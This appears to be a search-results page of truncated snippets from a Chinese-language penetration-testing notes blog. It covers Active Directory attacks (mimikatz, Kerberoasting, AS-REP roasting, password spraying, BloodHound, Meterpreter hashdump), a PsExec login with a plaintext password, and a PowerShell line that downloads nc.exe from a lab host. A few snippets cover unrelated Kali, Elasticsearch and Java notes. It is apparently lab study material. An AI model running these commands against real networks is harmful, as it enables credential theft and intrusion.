搜尋結果

kali@kali:~$ tail /etc/proxychains4.conf 配置了Proxychains後，現在我們可以使用我們Kali機器上的smbclient列出HRSHARES...

PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege:...

密碼 取得方法: 密碼噴灑 crackmapexe hash破解 # impacket-GetUserSPNs => Kerberoasting攻擊 取得hash # hashc...

Get-NetUser 找到自己 sid # 方法一 PS C:\Tools> Get-NetUser -Identity stephanie logoncount ...

function1.ps1 function LDAPSearch { param ( [string]$LDAPQuery ) $PDC ...

# /nowrap，以防止將新行添加到生成的AS-REP哈希 PS C:\Users\jeff> cd C:\Tools PS C:\Tools> .\Rubeus.exe asrepr...

kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast cor...

我們可以獲取並緩存Kerberos TGT。我們需要提供用戶名和密碼。如果憑證有效，我們將獲取一個TGT。這種技術的優勢在於，它僅使用兩個UDP帧來確定密碼是否有效，因為它僅發送AS-REQ並檢...

PS C:\Users\jeff> cd C:\Tools PS C:\Tools> powershell -ep bypass ... PS C:\Tools> .\Spray-...

PS C:\Tools> Import-Module .\Sharphound.ps1 PS C:\Tools> Get-Help Invoke-BloodHound PS C:\T...

然而，它需要在SSH客戶端上具有root權限並在SSH伺服器上使用Python3，因此它並非始終是最輕量級的選擇。 # kali -> vm1 (192.168.50.63 | 10.4.50...

PsLoggedOn將列舉HKEY_USERS下的注冊表密鑰，以檢索已登錄用戶的安全標識符（SID）並將SID轉換為用戶名。 PsLoggedOn還將使用NetSessionEnum API查看...

PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-NetDomain PS C:\Tools> Get-NetUser ...

【kali】解析度設定 【1400 X 900】 【VirtualBox】【檢視】-> 【全螢幕模式】 【VirtualBox】【虛擬畫面1】-> 【縮放至200%】  

產生payload 提權  getsystem 修改進程ID ps migrate {pid} getgiid 其他模組 hashdump: 轉儲 SAM 數據庫的內容 ...

# 替換 <your_elasticsearch_host> 和 <index_name_pattern> 為實際的 Elasticsearch 主機和索引名稱模式 # 列出所有索引 c...

nohup java -server -Xms4096m -Xmx4096m -XX:+UseG1GC -XX:G1HeapRegionSize=1m -XX:+UseStringD...

出處 : https://blog.csdn.net/vitaviva/article/details/107587134 建立集合  不可變更集合 immutable import ...

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net u...

  # 使用帳密連線至另一主機 .\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd